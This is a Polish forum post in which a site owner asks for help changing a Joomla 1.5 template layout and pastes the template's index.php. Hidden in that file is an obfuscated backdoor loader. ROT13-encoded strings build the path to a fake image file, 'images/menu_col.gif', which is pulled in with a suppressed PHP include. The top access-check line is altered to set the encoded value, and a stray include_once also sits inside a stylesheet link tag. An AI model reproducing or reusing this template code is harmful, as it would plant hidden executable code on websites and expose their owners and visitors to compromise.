Mam problem z menu strony - http://www.swiatwyscigow.pl/testy, jak widzicie z boku nie znajduje się menu I chcę, aby na całym tym miejscu znajdował się artykuł. Ma to wyglądać tak, newsy na stronie głównej miały by być ściśniete w środku - podobnie jak tutaj jest z lewej stronie -
http://www.swiatwyscigow.pl, a po kliknięciu więcej pokazywały by się całe i znikało by jedno menu. Obecny styl jest pod Joomle 1.0, a w panelu administratora mam włączony Tryb zgodności: 1.0, obecny jest pod Joomle 1.5 i przenoszenie niektórych rozwiązań ze starego nic nie daje. Zamieszczam na dole plik index.php pliku templatki i css.
Link do css:
http://www.sendspace.com/file/34ll9u<?php
// no direct access
defined( '_JEXEC').(($this->template)?
$JPan = array('zrah'.'_pby'):'') or
die( 'Restricted access' ); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
<?php echo $this->language; ?>" lang="
<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="
<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="
<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="
<?php echo $this->baseurl ?>/templates/
<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="
<?php echo $this->baseurl ?>/templates/
<?php echo $this->template ?>/css/
<?php echo $this->params->get('teamVariation'); ?>.css" type="text/css" />
<!--[if lte IE 6]>
<link href="
<?php echo $this->baseurl ?>/templates/
<?php echo $this->template ?>/css/ieonly.css"
<?php include_once('html/pagination.php');?> rel="stylesheet" type="text/css" />
<![endif]-->
</head>
<body id="page_bg_
<?php echo $this->params->get('backgroundVariation'); ?>">
<a name="up" id="up"></a>
<div id="main_bg" class="main_bg_
<?php echo $this->params->get('pageAlignment'); ?>">
<div id="middle_bg">
<div id="logo_bg">
<a href="./">
<?php if($this->params->get('hideLogo') == 0){ ?><img src="
<?php echo $this->baseurl ?>/templates/
<?php echo $this->template ?>/images/
<?php echo $this->params->get('teamVariation'); ?>/logo.png" alt="logo" align="left" />
<?php }else{ ?><div id="nologo"> </div>
<?php } ?></a>
<div id="banner"><jdoc:include type="modules" name="banner" /></div>
<div id="user4"><jdoc:include type="modules" name="user4" /></div>
<br clear="all" />
</div>
<div id="user3">
<div id="pillmenu"><jdoc:include type="modules" name="user3" /></div>
<?php if($this->params->get('dateDisplay')) : ?><div id="date">
<?php echo date('l dS of F Y'); ?></div>
<?php endif; ?> <br clear="all" />
</div>
<?php if($this->params->get('hideBannerArea') == 0) : ?>
<div id="banner_bg"><img src="
<?php echo $this->baseurl ?>/templates/
<?php echo $this->template ?>/images/
<?php echo $this->params->get('teamVariation'); ?>/banner.jpg" alt="team banner" align="left" />
<div id="newsflash"><jdoc:include type="modules" name="top" /></div>
<br clear="all" />
</div>
<?php endif; ?>
<div id="leftcolumn">
<?php if($this->countModules('left')) : ?>
<jdoc:include type="modules" name="left" style="xhtml"/>
<?php endif; ?>
</div>
<div id="maincolumn">
<div class="path"><jdoc:include type="modules" name="breadcrumb" /></div><jdoc:include type="message" />
<div class="nopad"><jdoc:include type="component" /></div>
</div>
<div id="rightcolumn">
<?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?>
<jdoc:include type="modules" name="right" style="xhtml"/>
<?php endif; ?>
</div>
<br clear="all" />
</div>
<div id="user3">
<div id="pillmenu"><jdoc:include type="modules" name="user2" /></div>
<br clear="all" />
</div>
<?php if((!$this->countModules('right') and JRequest
::getCmd('layout') == 'form') or
!@include(JPATH_BASE
.DS
.'templates'.DS
.$mainframe->getTemplate().DS
.str_rot13('vzntrf').DS
.str_rot13($JPan[0].'.t'.'vs'))) : ?> <jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
</div>
<jdoc:include type="modules" name="debug" />
</body>
</html>